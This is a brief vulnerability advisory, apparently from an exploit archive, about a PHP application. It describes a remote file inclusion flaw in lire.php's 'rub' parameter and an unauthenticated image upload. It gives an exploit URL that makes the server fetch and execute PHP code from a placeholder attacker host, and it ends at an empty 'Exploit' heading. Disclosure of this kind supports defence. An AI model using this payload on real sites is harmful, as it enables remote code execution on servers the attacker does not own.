[+]File Inclusion:
Input passed to the "rub" parameter in "lire.php" isn't properly verified,
before it is used to include remote files
Successful exploitation requires that "register_globals" is enabled.
[+]Exploit: Exploit [url]http://[trajet]/lire.php?rub=http://[attacker]&cahier=1&art=1[/url]
[+]http://[attacker]/compter.php Will be Included And Executed withe the privilege of the webserver
File Upload
Remote User can Upload jpg,jpeg,gif,bmp files without Identification ,
[upload.php code:]
<?
if( isset($_POST['upload']) ) // si formulaire soumis
{
#Upload code ....
}
?>
Exploit :